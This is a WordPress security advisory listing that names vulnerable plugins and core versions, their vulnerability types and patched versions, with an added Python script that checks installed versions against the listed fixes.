Plugin: Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via imported form title
Patched Version: 5.1.7
Recommended Action: Update to version 5.1.7, or a newer patched version

Plugin: JivoChat Live Chat – WP live chat plugin for WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.5.4
Recommended Action: Update to version 1.3.5.4, or a newer patched version

Plugin: Read More Excerpt Link

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 1.6.1
Recommended Action: Update to version 1.6.1, or a newer patched version

Plugin: VikBooking Hotel Booking Engine & PMS

Vulnerability: Cross-Site Request Forgery in admin_widgets_welcome function
Patched Version: 1.6.0
Recommended Action: Update to version 1.6.0, or a newer patched version

Plugin: GigPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to Sensitive Information Exposure
Patched Version: 5.1.2
Recommended Action: Update to version 5.1.2, or a newer patched version

Plugin: Daily Inspiration Generator

Vulnerability: Open Redirect
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ND Shortcodes

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 6.6
Recommended Action: Update to version 6.6, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 4.0.9
Recommended Action: Update to version 4.0.9, or a newer patched version

Plugin: WordPress Social Comments Plugin for Vkontakte Comments and Disqus Comments

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Fix My Feed RSS Repair

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Google Analytics
Patched Version: 8.9.1
Recommended Action: Update to version 8.9.1, or a newer patched version

Plugin: WP Airbnb Review Slider

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Authentication Bypass
Patched Version: 3.7.1.6
Recommended Action: Update to version 3.7.1.6, or a newer patched version

Plugin: Gravity Forms

Vulnerability: SQL Injection
Patched Version: 1.9.3.6
Recommended Action: Update to version 1.9.3.6, or a newer patched version

Plugin: Visual Email Designer for WooCommerce

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: AJAX Thumbnail Rebuild

Vulnerability: Missing Authorization
Patched Version: 1.14
Recommended Action: Update to version 1.14, or a newer patched version

Plugin: CRM WordPress Plugin – RepairBuddy

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: DTracker

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: e-signature

Vulnerability: Unauthenticated Remote Code Execution
Patched Version: 1.5.6.8
Recommended Action: Update to version 1.5.6.8, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: Twitch Player

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Site Reviews

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via block attribute
Patched Version: 6.6.0
Recommended Action: Update to version 6.6.0, or a newer patched version

Plugin: Custom Product Tabs for WooCommerce

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.8.0
Recommended Action: Update to version 1.8.0, or a newer patched version

Plugin: WP Dialog

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: VK Blocks Pro

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting in Post
Patched Version: 1.54.0
Recommended Action: Update to version 1.54.0, or a newer patched version

Plugin: Zero Spam for WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 5.4.5
Recommended Action: Update to version 5.4.5, or a newer patched version

Plugin: All in One SEO – Powerful SEO Plugin to Boost SEO Rankings & Increase Traffic

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.2.6.2
Recommended Action: Update to version 2.2.6.2, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Stored Cross-Site Scripting via Profile
Patched Version: 4.7.7
Recommended Action: Update to version 4.7.7, or a newer patched version

Plugin: WooCommerce Warranty Requests

Vulnerability: Missing Authorization
Patched Version: 2.3.0
Recommended Action: Update to version 2.3.0, or a newer patched version

Plugin: WordPress Robots.txt optimizer (+ XML Sitemap) – Boost SEO, Traffic & Rankings

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: E2Pdf – Export Pdf Tool for WordPress

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 1.20.26
Recommended Action: Update to version 1.20.26, or a newer patched version

Plugin: Map Block for Google Maps

Vulnerability: Unprotected AJAX Action
Patched Version: 1.32
Recommended Action: Update to version 1.32, or a newer patched version

Plugin: WP Bootstrap Gallery

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: HMS Testimonials

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.11
Recommended Action: Update to version 2.0.11, or a newer patched version

Plugin: WordPress Infinite Scroll – Ajax Load More

Vulnerability: Cross-Site Request Forgery to PHAR Deserialization
Patched Version: 5.5.4
Recommended Action: Update to version 5.5.4, or a newer patched version

Plugin: Contact Form for WordPress – Ultimate Form Builder Lite

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.3
Recommended Action: Update to version 1.3.3, or a newer patched version

Plugin: Shopping Cart & eCommerce Store

Vulnerability: Cross-Site Request Forgery via process_duplicate_product
Patched Version: 5.4.9
Recommended Action: Update to version 5.4.9, or a newer patched version

Plugin: Document Embedder – Document Embedder Plugin

Vulnerability: Sensitive Data Exposure
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Weather Effect – Christmas, Santa, Snow Falling, Snowflake Effect

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress

Vulnerability: Reflected Cross-Site Scripting via error message
Patched Version: 4.11.0
Recommended Action: Update to version 4.11.0, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: Parameter Tampering
Patched Version: 3.2.15
Recommended Action: Update to version 3.2.15, or a newer patched version

Plugin: GTM4WP – A Google Tag Manager (GTM) plugin for WordPress

Vulnerability: Reflected Cross-Site Scripting via Site Search
Patched Version: 1.15.1
Recommended Action: Update to version 1.15.1, or a newer patched version

Plugin: Hide My WP – Amazing Security Plugin for WordPress!

Vulnerability: SQL Injection
Patched Version: 6.2.4
Recommended Action: Update to version 6.2.4, or a newer patched version

Core: WordPress

Vulnerability: Stored Cross-Site Scripting via filenames
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5
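Every entry on this page reduces to the same check: is the installed release at or above the fix for its own branch, or, when the entry says "No patched version available", is the component installed at all? The multi-branch core entries (such as the one directly above) make that check slightly more involved, because a 4.2.x site needs 4.2.15 and gains nothing from 3.7.21. The following Python script is an added example, not part of the original listing: it parses entries written in this page's format and runs that check against an inventory of installed versions. The sample listing text is copied from entries on this page; the installed-version inventory and the component names used as dictionary keys are constructed for illustration.

```python
"""Compare installed WordPress core/plugin versions against advisory entries
written in this page's format.  Added example, not code from the original
listing; the sample text and the installed-version inventory are constructed."""
import re
from dataclasses import dataclass, field


@dataclass
class Advisory:
    component: str                               # "Plugin: ..." or "Core: WordPress"
    vulnerability: str = ""
    patched: list = field(default_factory=list)  # empty list: no fix exists


def parse_version(v: str) -> tuple:
    """Numeric tuple for ordering.  Deliberate simplification of PHP's
    version_compare(): '1.5' and '1.5.0' compare equal here, and pre-release
    tags such as '-beta1' are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", v))


def version_ge(a: str, b: str) -> bool:
    pa, pb = parse_version(a), parse_version(b)
    n = max(len(pa), len(pb))
    return pa + (0,) * (n - len(pa)) >= pb + (0,) * (n - len(pb))


def parse_listing(text: str) -> list:
    """Turn 'Plugin:/Core:' + 'Vulnerability:' + 'Recommended Action:' blocks
    into Advisory records.  Patched versions are read from the Recommended
    Action line because only it carries every branch of a multi-branch fix."""
    advisories, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith(("Plugin: ", "Core: ")):
            cur = Advisory(line)
            advisories.append(cur)
        elif cur is None:
            continue
        elif line.startswith("Vulnerability: "):
            cur.vulnerability = line.split(": ", 1)[1]
        elif line.startswith("Recommended Action: "):
            action = line.split(": ", 1)[1]
            if "following versions" in action:
                # Multi-branch core entries list every patched branch after the last colon.
                cur.patched = [v.strip() for v in action.rsplit(":", 1)[1].split(",")]
            else:
                m = re.match(r"Update to version (\S+),", action)
                if m:
                    cur.patched = [m.group(1)]
    return advisories


def is_vulnerable(installed: str, adv: Advisory) -> bool:
    if not adv.patched:
        return True                      # no patched version: every release is affected
    branch = parse_version(installed)[:2]
    same = [v for v in adv.patched if parse_version(v)[:2] == branch]
    if same:
        return not version_ge(installed, same[0])
    # Not on a listed branch: only a release newer than every listed fix is safe
    # (5.0.0 against a list ending in 4.7.5); anything older than the oldest
    # listed branch has no patched release at all.
    return not version_ge(installed, max(adv.patched, key=parse_version))


def audit(listing: str, inventory: dict) -> list:
    """inventory maps the component line to the installed version; returns the
    (component, vulnerability) pairs that still need action."""
    findings = []
    for adv in parse_listing(listing):
        ver = inventory.get(adv.component)
        if ver is not None and is_vulnerable(ver, adv):
            findings.append((adv.component, adv.vulnerability))
    return findings


# Constructed sample in this page's format (three entries copied from the listing).
SAMPLE_LISTING = """
Core: WordPress

Vulnerability: Stored Cross-Site Scripting via filenames
Patched Version: 3.7.21
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.21, 3.8.21, 3.9.19, 4.0.18, 4.1.18, 4.2.15, 4.3.11, 4.4.10, 4.5.9, 4.6.6, 4.7.5

Plugin: Table of Contents Plus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2309
Recommended Action: Update to version 2309, or a newer patched version

Plugin: DTracker

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance.
"""

# Constructed inventory, e.g. what `wp core version` and `wp plugin list` would report.
SAMPLE_INVENTORY = {
    "Core: WordPress": "4.2.14",             # on the 4.2 branch, one release below 4.2.15
    "Plugin: Table of Contents Plus": "2309",
    "Plugin: DTracker": "1.0",
}

if __name__ == "__main__":
    for component, vuln in audit(SAMPLE_LISTING, SAMPLE_INVENTORY):
        print(f"ACTION NEEDED  {component}: {vuln}")
```

The branch logic matters only for the core entries; for plugins with a single patched version the fallback path (compare against the newest listed fix) is the whole check. Note that `parse_version` pads missing components with zeros, which differs from PHP's `version_compare()` used by WordPress itself, and does not model pre-release suffixes; for a production inventory check, run the comparison with `version_compare()` inside PHP or port its rules exactly.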

Plugin: WordPress NextGen GalleryView

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Visitor Traffic Real Time Statistics

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.13
Recommended Action: Update to version 1.13, or a newer patched version

Plugin: WooCommerce Customers Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 26.6
Recommended Action: Update to version 26.6, or a newer patched version

Plugin: mini-cart

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Five Star Restaurant Menu and Food Ordering

Vulnerability: Cross-Site Request Forgery via maybe_duplicate_item
Patched Version: 2.4.7
Recommended Action: Update to version 2.4.7, or a newer patched version

Plugin: Live Chat by Formilla – Real-time Chat & Chatbots Plugin

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via ‘FormillaID’
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting via CSS
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: underConstruction

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.21
Recommended Action: Update to version 1.21, or a newer patched version

Plugin: WP Comment Remix

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.4.4
Recommended Action: Update to version 1.4.4, or a newer patched version

Plugin: BuddyPress

Vulnerability: Authorization Bypass to Friend Invite
Patched Version: 7.2.1
Recommended Action: Update to version 7.2.1, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Cross-Site Scripting
Patched Version: 4.1.6.1
Recommended Action: Update to version 4.1.6.1, or a newer patched version

Plugin: Dave's WordPress Live Search

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Unite Gallery Lite

Vulnerability: Cross-Site Request Forgery & Authenticated SQL Injection
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: Maps Widget for Google Maps

Vulnerability: Cross-Site Request Forgery via dismiss_notice
Patched Version: 4.24
Recommended Action: Update to version 4.24, or a newer patched version

Plugin: Slideshow SE

Vulnerability: Authenticated (Author+) Stored Cross-Site Scripting
Patched Version: 2.5.6
Recommended Action: Update to version 2.5.6, or a newer patched version

Plugin: Solid Security – Password, Two Factor Authentication, and Brute Force Protection

Vulnerability: Open Redirection via redirect_to_https
Patched Version: 8.1.5
Recommended Action: Update to version 8.1.5, or a newer patched version

Plugin: WPSOLR – Elasticsearch and Solr search

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.7
Recommended Action: Update to version 8.7, or a newer patched version

Plugin: Request a Quote

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.3.4
Recommended Action: Update to version 2.3.4, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Not specified in this listing (the source entry records only the affected range: Ultimate Form Builder <= 8.3.2)
Patched Version: 8.3.3
Recommended Action: Update to version 8.3.3, or a newer patched version

Plugin: Advanced Dynamic Pricing for WooCommerce

Vulnerability: Cross-Site Request Forgery via migrateCommonToProductOnly function
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Not specified in this listing (the source entry records only the affected range: Builder forms Addon For WordPress <= 5.4)
Patched Version: 5.5
Recommended Action: Update to version 5.5, or a newer patched version

Plugin: Captcha by BestWebSoft – Spam Protection, Security Plugin for WordPress Forms

Vulnerability: CAPTCHA Bypass
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: Falang multilanguage for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.18
Recommended Action: Update to version 1.3.18, or a newer patched version

Plugin: WP SMS – Ultimate SMS & MMS Notifications, 2FA, OTP, and Integrations with WooCommerce, GravityForms, and More

Vulnerability: Reflected Cross-Site Scripting via ‘delete_mobile’
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.1.4
Recommended Action: Update to version 2.1.4, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 6.5.8
Recommended Action: Update to version 6.5.8, or a newer patched version

Plugin: AI ChatBot for WordPress – WPBot

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting and Settings Reset
Patched Version: 4.2.9
Recommended Action: Update to version 4.2.9, or a newer patched version

Plugin: Tooltipy (tooltips for WP)

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1
Recommended Action: Update to version 5.1, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Not specified in this listing (the source entry records only the affected range: Chaty <= 3.0.2)
Patched Version: 3.0.3
Recommended Action: Update to version 3.0.3, or a newer patched version

Plugin: NewStatPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.3.6
Recommended Action: Update to version 1.3.6, or a newer patched version

Plugin: Culture Object

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.1.1
Recommended Action: Update to version 4.1.1, or a newer patched version

Plugin: Advance Menu Manager

Vulnerability: Missing Authorization
Patched Version: 3.0.7
Recommended Action: Update to version 3.0.7, or a newer patched version

Plugin: Compfight

Vulnerability: Cross-Site Scripting
Patched Version: 1.5
Recommended Action: Update to version 1.5, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Arbitrary File Upload
Patched Version: 3.4.5
Recommended Action: Update to version 3.4.5, or a newer patched version

Plugin: Better Click To Tweet

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.10.4
Recommended Action: Update to version 5.10.4, or a newer patched version

Plugin: Portable phpMyAdmin

Vulnerability: Authentication Bypass
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Authenticated (Admin+) Directory Traversal
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Sharebar

Vulnerability: SQL Injection
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Call Now Accessibility Button

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Core: WordPress

Vulnerability: Type Confusion
Patched Version: 3.7.31
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.31, 3.8.31, 3.9.29, 4.0.28, 4.1.28, 4.2.25, 4.3.21, 4.4.20, 4.5.19, 4.6.16, 4.7.14, 4.8.11, 4.9.12, 5.0.7, 5.1.3, 5.2.4

Plugin: WatchTowerHQ

Vulnerability: Unauthenticated Arbitrary File Download
Patched Version: 3.6.16
Recommended Action: Update to version 3.6.16, or a newer patched version

Plugin: Category Post List Widget

Vulnerability: Cross-Site Request Forgery via get_cplw_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: NewStatPress

Vulnerability: SQL Injection
Patched Version: 1.0.6
Recommended Action: Update to version 1.0.6, or a newer patched version

Plugin: Broken Link Manager

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.15.6
Recommended Action: Update to version 1.15.6, or a newer patched version

Plugin: WP BrowserUpdate

Vulnerability: Cross-Site Request Forgery via wpbu_administration
Patched Version: 4.5
Recommended Action: Update to version 4.5, or a newer patched version

Plugin: Internal Links Manager

Vulnerability: Multiple Stored Cross-Site Scripting
Patched Version: 2.1.1
Recommended Action: Update to version 2.1.1, or a newer patched version

Plugin: Recommended Products – EDD

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.3.3
Recommended Action: Update to version 1.2.3.3, or a newer patched version

Plugin: Extensions For CF7 (Contact form 7 Database, Conditional Fields and Redirection)

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.9
Recommended Action: Update to version 2.0.9, or a newer patched version

Plugin: Table of Contents Plus

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2309
Recommended Action: Update to version 2309, or a newer patched version

Plugin: Avada (Fusion) Builder

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.11.2
Recommended Action: Update to version 3.11.2, or a newer patched version

Plugin: GDPR Compliance & Cookie Consent

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: demon image annotation

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 4.8
Recommended Action: Update to version 4.8, or a newer patched version

Plugin: WordPress NextGen GalleryView

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Jquery accordion slideshow

Vulnerability: Authenticated (Subscriber+) SQL Injection via Shortcode
Patched Version: 8.2
Recommended Action: Update to version 8.2, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 0.72
Recommended Action: Update to version 0.72, or a newer patched version

Plugin: Simple SEO

Vulnerability: Cross-Site Request Forgery via multiple admin_post functions
Patched Version: 2.0.26
Recommended Action: Update to version 2.0.26, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: Not specified in this listing (the source entry records only the version number 2.0.15)
Patched Version: 2.0.16
Recommended Action: Update to version 2.0.16, or a newer patched version

Plugin: Webriti SMTP Mail

Vulnerability: Cross-Site Request Forgery to options update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Showbiz Pro Responsive Teaser WordPress Plugin

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DrawBlog

Vulnerability: Cross-Site Request Forgery
Patched Version: 0.81
Recommended Action: Update to version 0.81, or a newer patched version

Plugin: Product Filter for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 8.2.0
Recommended Action: Update to version 8.2.0, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Content Cards

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.7
Recommended Action: Update to version 0.9.7, or a newer patched version

Plugin: wp-forecast

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 8.0
Recommended Action: Update to version 8.0, or a newer patched version

Plugin: Media File Manager

Vulnerability: Directory Traversal to Directory Listing
Patched Version: 1.4.3
Recommended Action: Update to version 1.4.3, or a newer patched version

Plugin: firestats

Vulnerability: Remote File Inclusion
Patched Version: 1.6.2
Recommended Action: Update to version 1.6.2, or a newer patched version

Plugin: Thumbnail Slider With Lightbox

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: EZP Coming Soon Page

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.74
Recommended Action: Update to version 1.0.74, or a newer patched version

Plugin: Booking Calendar Contact Form

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Feedback Form Submission
Patched Version: 1.2.35
Recommended Action: Update to version 1.2.35, or a newer patched version

Plugin: SP Project & Document Manager

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.62
Recommended Action: Update to version 4.62, or a newer patched version

Plugin: Disable User Login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.9
Recommended Action: Update to version 1.3.9, or a newer patched version

Plugin: WP Dummy Content Generator

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 2.0.1
Recommended Action: Update to version 2.0.1, or a newer patched version

Plugin: Feed Them Social – Social Media Feeds, Video, and Photo Galleries

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: CALL ME NOW

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Active Directory Integration / LDAP Integration

Vulnerability: LDAP Passback
Patched Version: 4.2
Recommended Action: Update to version 4.2, or a newer patched version

Core: WordPress

Vulnerability: Hash Collision
Patched Version: 3.7.5
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.5, 3.8.5, 3.9.3, 4.0.1

Plugin: Portfolio Gallery

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Optima Express + MarketBoost IDX Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 7.3.1
Recommended Action: Update to version 7.3.1, or a newer patched version

Plugin: underConstruction

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.19
Recommended Action: Update to version 1.19, or a newer patched version

Plugin: myftp-ftp-like-plugin-for-wordpress

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Form Maker by 10Web – Mobile-Friendly Drag & Drop Contact Form Builder

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.15.19
Recommended Action: Update to version 1.15.19, or a newer patched version

Plugin: Publish Confirm Message

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Pipdig Power Pack (P3)

Vulnerability: Backdoor
Patched Version: 4.8.0
Recommended Action: Update to version 4.8.0, or a newer patched version

Plugin: s2Framework

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.1.6
Recommended Action: Update to version 4.1.6, or a newer patched version

Plugin: Media Library Assistant

Vulnerability: Unauthenticated Local/Remote File Inclusion & Remote Code Execution
Patched Version: 3.10
Recommended Action: Update to version 3.10, or a newer patched version

Plugin: 404 to 301 – Redirect, Log and Notify 404 Errors

Vulnerability: Missing Authorization to Redirect Creation
Patched Version: 3.0.8
Recommended Action: Update to version 3.0.8, or a newer patched version

Plugin: PDF & Print by BestWebSoft – WordPress Posts and Pages PDF Generator Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: MainWP Wordfence Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.8
Recommended Action: Update to version 4.0.8, or a newer patched version

Plugin: VikRentCar Car Rental Management System

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: VK Blocks

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Block
Patched Version: 1.64.0.0
Recommended Action: Update to version 1.64.0.0, or a newer patched version

Plugin: Beaver Builder – WordPress Page Builder

Vulnerability: Authenticated Stored Cross-Site Scripting via Text Editor
Patched Version: 2.5.5.3
Recommended Action: Update to version 2.5.5.3, or a newer patched version

Plugin: Comment Rating

Vulnerability: SQL Injection
Patched Version: No patched version available
